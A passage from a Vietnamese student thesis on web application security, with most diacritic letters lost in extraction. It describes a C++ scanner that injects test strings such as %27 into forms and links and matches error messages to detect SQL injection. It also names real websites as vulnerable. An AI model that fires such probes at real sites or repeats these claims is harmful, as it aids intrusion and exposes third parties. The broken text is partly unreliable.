Mc d vic bo mt l kh khn v h thng khng bao gi c xem l t 100% v an ton nhng nu c s kt hp y gia ba nhn t trn th s gim thiu ti a nhng ri ro c th xy ra. Thiu mt trong ba nhn t th h thng lun nm trong trng thi bo ng v an ton.
-Trang 139-
Khoa CNTT
Phn III: Chng trnh Web Checker
PHN TH BA
CHNG TRNH WEB CHECKER
-Trang 140-
Khoa CNTT
Chng 13: Chng trnh Web Checker
Chng 13
CHNG TRNH WEB CHECKER

Ni dung: I. II. III. IV. c t chng trnh Web Checker Kin trc chng trnh Web Checker Ci t nh gi chng trnh
-Trang 141-
Khoa CNTT
CHNG 13: CHNG TRNH WEB CHECKER
I. C T CHNG TRNH WEB CHECKER

I.1. Tng quan
Chng trnh Web Checker l mt ng dng dng minh ha cho mt s k thut tn cng c trnh by phn trn nh SQL Injection, Form Field Manipulation v URL Manipulation, m trng tm l SQL Injection. T tng , chng trnh s c kh nng kim tra ng dng Web c mc phi li bo mt SQL injection, Form Field Manipulation, URL Manipulation hay khng. Bng cch ng dng s nhn trang web cn kim tra t ngi s dng, ri t ng tm thng tin ca trang Web v to ra cc yu cu gi n trnh ch. Sau nhn, phn tch kt qu tr v nh gi, kim tra v thng bo cho ngi s dng.
I.2. Yu cu
T nhng tng trn, ng dng c nhng yu cu nh sau:
I.2.1. Yu cu chc nng

Chc nng duyt Web. Kim tra, pht hin mt s l hng bo mt ca ng dng Web nh: o Chn cu truy vn SQL (SQL Injection) o Thao tc trn tham s truyn (Parameter Manipulation) nh du, thng bo kt qu kim tra. Gi cc bin php khc phc i vi l hng pht hin c.
-Trang 142-
Khoa CNTT
I.2.2. Yu cu phi chc nng

D s dng: ng dng phi cung cp mt giao din trc quan, r rng, d s dng.
II.KIN TRC CHNG TRNH WEB CHECKER

II.1. Kin trc chng trnh Web Checker
Chng trnh c chia lm hai tng: Tng 1 (giao din) c nhim v: o Duyt Web (cung cp trang cn kim tra). o Hin th kt qu kim tra Tng 2 (x l) c nhim v: o Ly trang Web c yu cu kim tra o To cc mu th (ly d liu kim tra kt hp vi thng tin t trang Web, ng gi thnh HTTP request) gi n trnh ch. o X l thng tin tr li t trnh ch a ra kt qu.
-Trang 143-
Khoa CNTT
Hnh 13.II.1-1: Kin trc phn tng ca ng dng Web Checker
II.2. Giao tip gia chng trnh vi trnh ch Web

Giao tip gia ng dng vi trnh ch l giao tip gia client v server. Trong trnh ch l server cn ng dng l client kt ni n server theo kiu stream socket.
Hnh 13.II.2-1: Giao tip gia ng dng v trnh ch
-Trang 144-
Khoa CNTT
III. CI T
III.1. Ngn ng ci t
Web Checker l ng dng c s dng giao thc HTTP trao i thng tin trn mng. Do cng vic lp trnh c n gin, ng dng phi tn dng cc th vin lp trnh mng v ActiveX Control c sn trong cc mi trng lp trnh. Mt phn cng quan trng khng km l ngn ng c chn l mi trng ci t phi quen thuc, c th d dng nhanh chng vn dng xy dng ng dng. Vi cc l do trn, lun vn chn MS Visual C++ lm mi trng pht trin cho ng dng. Yu cu h thng: o H iu hnh:WinXp, WinNT, Win 2000, Win 9x vi giao thc TCP/IP o Mng: Kt ni Internet hoc trnh ch Web ti my cc b. o Phn cng: cng cn trng 10 MB.
III.2. Phng php ci t III.2.1. S dng m hnh giao din dng Dialog
Do ng dng c xy dng vi tnh n gin d s dng ch gm mt mn hnh. Nn m hnh giao din c chn l Dialog.
III.2.2. S dng ActiveX Control (Microsoft Web Browser)

ng dng c s dng ActiveX Control (Microsoft Web Browser) ca MS VC++ cung cp chc nng trnh duyt Web. Qua trnh duyt ngi s dng cung cp trang Web cn kim tra cho ng dng.
-Trang 145-
Khoa CNTT
III.2.3. S dng giao din lp trnh Window Socket 2

ng dng s dng giao din lp trnh Window Socket 2 lp trnh stream socket, kt ni n trnh ch Web.
III.2.4. Mt s lp v hm chnh c ci t trong chng trnh

Lp CCheckerDlg
class CCheckerDlg : public CDialog { public: void getTestFile(); void markChecked(CString &); CString evaluateRslt(Result *); void scanWeb(); //Ly d liu mu kim //nh du vi tr kim tra //phn tch kt qu //Kim tra trang Web //Mng cha kt qu
CArray < Result *, Result *> m_result; CArray < Test *, Test *> m_Test; bool m_IsPost; CString m_sData; CString m_HTTPbody; CString m_HTTPreceive; CString m_HTTPsend; ... protected:
//Mng cha d liu mu kim
// Loi yu cu POST/GET //D liu trong Header yu cu //Phn thn ca HTTP tr li //Header tr li //Header yu cu
afx_msg void OnBeforeNavigate2Explorer(LPDISPATCH, VARIANT FAR*, VARIANT FAR*, VARIANT FAR*, VARIANT FAR*, VARIANT FAR*, BOOL FAR*); private: //Hm bt s kin trn trnh duyt Web
-Trang 146-
Khoa CNTT
void Browse(); void InsertHTML() };
//Gi/nhn thng vi trnh ch //Hin th thng tin tr li thnh Web
K tha t lp CDialog, ngoi nhim v qun l dialog, lp cn c chc nng sau: Thc hin cc yu cu duyt Web ca ngi dng thng qua phng thc Browse(). Hin th d liu ca bin m_HTTPbody thnh trang Web thng qua phng thc InsertHTML(). Phng thc getTextFile() c d liu mu kim t tp tin ngay khi chy chng trnh v lu tr trong mng m_Test. Phng thc scanWeb() l phng thc chnh c gi khi ngi s dng chn nt kim tra. Phng thc c chc gi cc hm x l khc kim tra trang Web, phn tch v a ra kt qu. Lp Checker
class Checker { public: void inject(CString &, int, CString ); //Chn d liu mu kim vo CString getForumValue(int ,CString ,CString &,CString &, CString &); //Ly d liu trong form //Ly d liu trong lin kt Checker(); virtual ~Checker(); ... Cstring getLinkValue(int ,CString, CString &,CString &)
-Trang 147-
Khoa CNTT
};
nh ngha cc phng thc: Ly d liu thc ca cc i tng cn kim nh form/ lin kt trong trang sau s c chng trnh ln lt chn cc mu kim thng qua phng thc inject() ri gi ln trnh ch. Chn gi tr mu kim vo d liu ca form/ lin kt.
Lp Request
class Request { public: Request(); virtual ~Request(); private: void ParseURL(LPCSTR url,LPSTR protocol,int lprotocol, LPSTR host,int lhost,LPSTR request,int lrequest,int *port); //Phn r chui URL int SendHTTP(LPCSTR url,LPCSTR headers,BYTE *post, DWORD
postLength,HTTPRequest *req); //M kt ni, gi HTTP yu cu v nhn HTTP tr li public: void SendRequest(bool IsPost, LPCSTR url, CString &psHeaderSend, CString &psHeaderReceive, CString &psMessage); //Nu yu cu l GET th dng cung cp ca ActiveX cn POST th gi hmSend HTTP ... };
nh ngha cc phng thc mc thp l giao tip trc tip vi trnh ch:
-Trang 148-
Khoa CNTT
Phng thc SendHTTP c gi thng qua cc phng thc SendRequest() v Browse(). Phng thc ny c nhim v to kt ni n trnh ch, gi yu cu v nhn thng ip tr li t trnh ch . Cc thng dip nhn v s c cp nht vo bin ton cc chnh l m_HTTPsend,m_HTTPreceive, m_HTTPbody.
Lp Test
class Test { public: Test(); virtual ~Test(); CString m_errType; CString m_errName; CString m_strInject; CArray <CString,CString> m_strRslt; }; //Loi l hng //Tn l hng //Chui k t chn //Cc chui kt qu
nh ngha kiu d liu mu kim. D liu s c c t tp tin test.txt. nh dng ca tp tin test.txt: Chui k t s chn vo
%27\1 ... incorrect syntax\1unclosed quotation mark\1 ... ... 1\2
Cc mu kt qu pht hin li
S th t li
Tn li
SQL Injection ...
Cc k t \1, \2 dng phn cch chui.
Lp Result
-Trang 149-
Khoa CNTT
class Result { public: Result(); virtual ~Result(); CString m_object; int m_ind; CString m_properties; }; //i tng kim tra //v tr trong trang Web //thuc tnh ca i tng
CArray <CString,CString> m_err; //Mng danh sch li nu c
nh ngha kiu d liu kt qu, c nhim v lu tr kt qu kim tra ca trang Web v c kt xut ra mn hnh chng trnh khi kim tra xong trang Web thng qua phng thc ShowResult().
-Trang 150-
Khoa CNTT
III.3. M T CHNG TRNH V CCH S DNG III.3.1. Mn hnh chng trnh
Hnh 13.III.3.1-1: Thnh phn ca mn hnh chng trnh
Mn hnh ng dng gm c ba phn chnh: ng dng web: nh mt trnh dng m trang web cn kim tra v hin th kt qu nh du trc tip vo v tr kim tra trong trang web c an ton hay khng an ton.
-Trang 151-
Khoa CNTT
Kt qu: Lit k kt qu sau kim tra gm cc v tr kim tra an ton hay khng an ton v nhng l hng m v tr mc phi. Li khuyn: Nu pht hin ra li th s hin th cch phng chng li khi chn tn li bn phn kt qu.
III.3.2. Cch s dng

Ngi dng g a ch vo hoc lin kt n trang web cn kim tra. Sau chn nt kim tra, chng trnh s hin th kt qu v li khuyn cch phng chng l hng b mc phi
Hnh 13.III.3.2-1: Mn hnh thng bo kt qu
-Trang 152-
Khoa CNTT
Chng trnh s nh du trc tip vo trang Web v tr c kim tra (mu xanh l an ton, mu l khng an ton).
IV. nh gi chng trnh

Nhng vn t c v nhng vn hn ch ca chng trnh sau khi th nghim trn mng o v trn Internet:
IV.1. Nhng vn t c
Thng pht hin mt s li bo mt nh SQL Injection, Form Field Manipulation, URL Manipulation ca mt ng dng Web trn Interbet minh ha cho phn l thuyt ca cc k thut . Th hin r rng, trc quan kt qu cc v tr kim tra. a ra cc gi v bin php phng chng i vi li bo mt pht hin c. V d 13.IV.1-1: Chng trnh pht hin c li bo mt v SQL Injection ca ng dng Web (www.progenic.com). C th l cc lin kt n ni dung tin tc khng c kim tra d liu nhp.
http://www.progenic.com/out/?id=5 ...
IV.2. Nhng vn hn ch
Do s dng c ch kh n gin l kim th v nh gi kt qu nhn c, nn chng trnh khng th pht hin cc li bo mt phc tp. Hiu qu t c thp i vi cc ng dng c cch thit k l.
-Trang 153-
Khoa CNTT
V d 13.IV.2-1: Chng trnh khng pht hin ra li vi ng dng Web (www.thanglongmetalwares.com/sanpham.asp) mc d ng dng c li bo mt SQL Injection. Nguyn nhn tht bi l do ng dng lu tr cu truy vn trong cc i tng ca form nn khi chng trnh kim tra form s lm thay i cu truy vn nn lm thay i hot ng ca ng dng Web.
<form method="post" action="Sanpham.asp" name="Sanpham"> <input type="hidden" name="strSQL" value="SELECT * FROM Products Where Language = 1 ORDER BY Date DESC"> <input type="hidden" name="Page" value="1"> ...
-Trang 154-
Khoa CNTT
Kt lun
KT LUN
Ni dung: I. II. Nhng vn t c Hng pht trin
-Trang 155-
Khoa CNTT
Kt lun
KT LUN
I. NHNG VN T C
Theo yu cu t ra ban u l Nghin cu cc k thut tn cng v bo mt ng dng Web, cho n thi im hin ti, lun vn t c cc ni dung sau: Tm hiu cc k thut tn cng ng dng Web bao gm cc k thut o Thao tc trn tham s truyn nh URL, bin n form, cookie, HTTP header. o Chn m lnh thc thi trn trnh khch Cross-site Scripting. o Chn cu truy vn SQL o nh chim phin lm vic ca ngi dng o Trn b m o T chi dch v o Cc k thut khc nh: M ha URL, vt ng dn, k t rng, ngn ng pha trnh ch, Cc bin php bo mt t s kt hp gia nh qun tr mng, nh thit k ng dng Web v ngi dng V chng trnh Web Checker t mt s ni dung c bn sau: o Kim tra mt trang Web c kh nng b tn cng bng nhng k thut chn cu lnh SQL, thay i tham s hay khng. o Chng trnh cho php ngi dng thc hin giao tip vi trnh ch ging nh mt trnh duyt thng thng.
-Trang 156-
Khoa CNTT
Kt lun
II. HNG PHT TRIN

Trong phm vi mt lun vn i hc, lun vn c bn t c cc yu cu t ra. Tuy nhin, cc kt qu cn kh khim tn do hn ch v ti liu v thi gian. Trong thi gian ti, nu c iu kin, lun vn s c gng pht trin thm nhng ni dung sau: Tm hiu thm v cc k thut tn cng a ra phng php bo mt ng dng Web mc su hn. Tm hiu v vn bo mt su hn, khng ch dng mc mt ng dng Web m pht trin hn vn bo mt cc h thng mng v dch v. Khai trin chng trnh pht hin l hng tt hn, trn nhiu phng din k thut. Pht trin chng trnh nh mt Proxy gia trnh ch vi cc trnh duyt. Mi yu cu t trnh duyt hay tr li t trnh ch u phi i qua chng trnh. Bt c khi no chng trnh kim tra thy kh nng tn cng t trnh duyt, chng trnh s t chi yu cu v ng kt ni.
-Trang 157-
Khoa CNTT
Ph lc
Ph lc
Ni dung: A. B. C. HTTP header URL Encoding Server Side Include
-Trang 158-
Khoa CNTT
Ph lc
Ph lc A: HTTP HEADER
Cc tham s thng thng l tham s c th dng trong c HTTP request v HTTP response Tn
Cache-Control Connection Date Pragma Trailer Transfer-Encoding Upgrade Via Warning max-age=10 Close Tue, 11 Jul 2000 18:23:51 GMT no-cache Date Chunked SHTTP/1.3 HTTP/1.1 Proxy1, HTTP/1.1 Proxy2 112 Disconnected Operation
Gi tr v d
Cc tham s ch c th dng trong HTTP Request Tn

Accept Accept-Charset Accept-Encoding Accept-Language Authorization Content-Encoding Expect From iso8859-5 gzip, compress en, fr [credentials] Gzip 100-continue user@microsoft.com
Gi tr v d
text/html, image/*
-Trang 159-
Khoa CNTT
Ph lc
Host If-Match If-Modified-Since If-None-Match If-Range If-Unmodified-Since Max-Forwards Proxy-Authorization Range Referer TE User-Agent
www.microsoft.com entity_tag001 Tue, 11 Jul 2000 18:23:51 GMT entity_tag001 entity_tag001 hay Tue, 11 Jul 2000 18:23:51 GMT Tue, 11 Jul 2000 18:23:51 GMT 3 [credentials] Bytes=100-599 http://www.microsoft.com/resources.asp trailers Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Cc tham s ch c th dng trong HTTP Response Tn

Accept-Ranges Age ETag Last-Modified Location Proxy-Authenticate Retry-After Server Vary WWW-Authenticate None 2147483648(2^31) b38b9-17dd-367c5dcd Tue, 11 Jul 2000 18:23:51 GMT http://localhost/redirecttarget.asp [challenge] Tue, 11 Jul 2000 18:23:51 GMT hay 60 Microsoft-IIS/5.0 Date [challenge]
Gi tr v d
-Trang 160-
Khoa CNTT
Ph lc
Cc tham s thc th c th dng trong HTTP request v HTTP response. Cc tham s ny cho bit thng tin v phn thn, v d nh l chun m ho c s dng. Tn
Allow Content-Encoding Content-Language Content-Length Content-Location Content-MD5 Content-Range Content-Type Expires Last-Modified GET, HEAD Gzip En 8445 http://localhost/page.asp [md5-digest] Bytes 2543-4532/7898 text/html Tue, 11 Jul 2000 18:23:51 GMT Tue, 11 Jul 2000 18:23:51 GMT
Gi tr v d
-Trang 161-
Khoa CNTT
Ph lc
Ph lc B: URL ENCODING
K t M Hexa
%00 %01 %02 %03 %04 %05 %06 %07 backspace %08 tab %09 %0b %0c c return %0d %0e %0f %10 %11 %12 %13 %14 %15 %16 %17 %18 %19 %1a %1b linefeed %0a 0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C D E F G H I J K %30 %31 %32 %33 %34 %35 %36 %37 %38 %39 %3a %3b %3c %3d %3e %3f %40 %41 %42 %43 %44 %45 %46 %47 %48 %49 %4a %4b ` a b c d e f g h i j k l m n o p q r s t u v w x y z { %60 %61 %62 %63 %64 %65 %66 %67 %68 %69 %6a %6b %6c %6d %6e %6f %70 %71 %72 %73 %74 %75 %76 %77 %78 %79 %7a %7b | %90 %91 %92 %93 %94 %95 %96 %97 %98 %99 %9a %9b %9c %9d %9e %9f %a0 %a1 %a2 %a3 %a4 %a5 %a6 %a7 %a8 %a9 %aa %ab %c0 %c1 %c2 %c3 %c4 %c5 %c6 %c7 %c8 %c9 %ca %cb %cc %cd %ce %cf %d0 %d1 %d2 %d3 %d4 %d5 %d6 %d7 %d8 %d9 %da %db %f0 %f1 %f2 %f3 %f4 %f5 %f6 %f7 %f8 %f9 %fa %fb %fc %fd %fe %ff
-Trang 162-
Khoa CNTT
Ph lc
%1c %1d %1e %1f space ! " # $ % & ' ( ) * + , . / %20 %21 %22 %23 %24 %25 %26 %27 %28 %29 %2a %2b %2c %2d %2e %2f
L M N O P Q R S T U V W X Y Z [ \ ] ^ _
%4c %4d %4e %4f %50 %51 %52 %53 %54 %55 %56 %57 %58 %59 %5a %5b %5c %5d %5e %5f
| } ~
%7c %7d %7e %7f %80 %81 %82 %83 %84 %85 %86 %87 %88 %89 %8a %8b %8c %8d %8e %8f
%ac %ad %ae %af %b0 %b1 %b2 %b3 %b4 %b5 %b6 %b7 %b8 %b9 %ba %bb %bc %bd %be %bf
%dc %dd %de %df %e0 %e1 %e2 %e3 %e4 %e5 %e6 %e7 %e8 %e9 %ea %eb %ec %ed %ee %ef
-Trang 163-
Khoa CNTT
Ph lc
Ph lc C: SERVER SIDE INCLUDE

Cu lnh SSI c chia lm 2 phn: + Cu lnh + Cu lnh iu khin Cu lnh
CONFIG
V d

Tham s Sizefmt, datefmt Get, alt, if, then
Gii thch iu khin kch thc file v ngy ly cookie trn trnh ch tng s kt ni
COOKIE COUNT ECHO EXEC FSize INCLUDE JDBC
,   
Var, reqstate, reqheader, here Cmd
hin th header yu cu, bin thc thi cu lnh
FLASHMOD 
  
thc thi servlet vi nhng tham s
Cu lnh iu khin
-Trang 164-
Khoa CNTT
Ph lc
COUNTER ELSE ENDIF ENDLOOP EXITLOOP

 
Name Name Name, command, var, equals Name, command, var, equals Name
 Name 
IF

LOOP

-Trang 165-
Khoa CNTT
Ti liu tham kho
TI LIU THAM KHO
Hacking Exposed, Stuart McClure, Joel Scambray, George Kurtz RFC2617, J.Franks, P. Hallam-Baker, J.Hostetler, S. Lawrence, P. Leach, A. Luotonen, L. Stewart 06/1999 http://www.sqlsecurity.com/ http://www.nextgenss.com/papers/ http://www.owasp.org/ http://www.4guysfromrolla.com/webtech/ http://www.guardent.com/ http://www.idefense.com/ http://www.jmu.edu/computing/info-security/engineering/issues/ http://www.microsoft.com/technet/support/ http://www.microsoft.com/technet/security/ http://community.whitehatsec.com/ http://www.codeproject.com/
-Trang 166-

Bao Mat Ung Dung Web Tren Internet - Diendandaihoc - VN - 08040603062011

Uploaded by

Copyright:

Available Formats

You might also like

Bao Mat Ung Dung Web Tren Internet - Diendandaihoc - VN - 08040603062011

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Bao Mat Ung Dung Web Tren Internet - Diendandaihoc - VN - 08040603062011

Uploaded by

Copyright:

Available Formats

Khoa CNTT

NGHIN CU MT S VN V BO MT NG DNG WEB TRN INTERNET

KHA HC: 1999-2003

Nghin cu mt s vn v bo mt ng dng Web trn Internet

Nghin cu mt s vn v bo mt ng dng Web trn Internet

PHN TH HAI: CC K THUT TN CNG V BO MT NG DNG WEB.. 33

Chng 6: Chn cu truy vn SQL (SQL Injection). 56

Nghin cu mt s vn v bo mt ng dng Web trn Internet

Nghin cu mt s vn v bo mt ng dng Web trn Internet

94 94 97 98 99 100 101 102 104 106 106 108

Nghin cu mt s vn v bo mt ng dng Web trn Internet

Nghin cu mt s vn v bo mt ng dng Web trn Internet

Nghin cu mt s vn v bo mt ng dng Web trn Internet

Nghin cu mt s vn v bo mt ng dng Web trn Internet

Nghin cu mt s vn v bo mt ng dng Web trn Internet

Nghin cu mt s vn v bo mt ng dng Web trn Internet

Chng 1: Gii thiu ng dng Web

GII THIU NG DNG WEB

Chng 1: Gii thiu ng dng Web

CHNG 1: GII THIU NG DNG WEB

I. KHI NIM NG DNG WEB

Chng 1: Gii thiu ng dng Web

Hnh 1.I-1. Kin trc mt ng dng Web

Chng 1: Gii thiu ng dng Web

Hnh 1.I-2. M hnh hot ng ca mt ng dng Web

Chng 1: Gii thiu ng dng Web

II.M T HOT NG CA MT NG DNG WEB

Chng 1: Gii thiu ng dng Web

Chng 2: Cc khi nim, thut ng lin quan

CC KHI NIM, THUT NG LIN QUAN

III. Phin lm vic (Session) IV. Cookie V. Proxy

Chng 2: Cc khi nim, thut ng lin quan

CHNG 2: CC KHI NIM, THUT NG LIN QUAN

Chng 2: Cc khi nim, thut ng lin quan

Chng 2: Cc khi nim, thut ng lin quan

Chng 2: Cc khi nim, thut ng lin quan

Chng 2: Cc khi nim, thut ng lin quan

Domain: Tn min ca trang web to cookie ( trong v d trn l www.redhat.com)

Chng 2: Cc khi nim, thut ng lin quan

Cc cookie ca Netscape (NS) t trong mt tp tin Cookies.txt, vi ng dn l: C:\Program Files\Netscape\Users\UserName\Cookies.txt

Chng 2: Cc khi nim, thut ng lin quan

Chng 3: Gii thiu s lc v cc k thut tn cng

GII THIU S LC V CC K THUT TN CNG NG DNG WEB

Chng 3: Gii thiu s lc v cc k thut tn cng

CHNG 3: GII THIU S LC V CC K THUT TN CNG NG DNG WEB

I. KIM SOT TRUY CP WEB (Web Access Control)

II.CHIM HU PHIN LM VIC(Session Mangement)

II.2. nh cp phin lm vic (Session Hijacking)

Chng 3: Gii thiu s lc v cc k thut tn cng

III. LI DNG CC THIU ST TRONG VIC KIM TRA

III.1. Kim tra tnh ng n ca d liu bng ngn ng pha

III.2. Trn b m (Buffer OverFlow)

III.3. M ho URL (URL Encoding)

III.4. K t Meta (Meta-characters)

Chng 3: Gii thiu s lc v cc k thut tn cng

III.5. Vt qua ng dn (Path Traversal):

III.6. Chn m lnh thc thi trn trnh duyt nn nhn

III.7. Thm cu lnh h thng (OS Command Injection):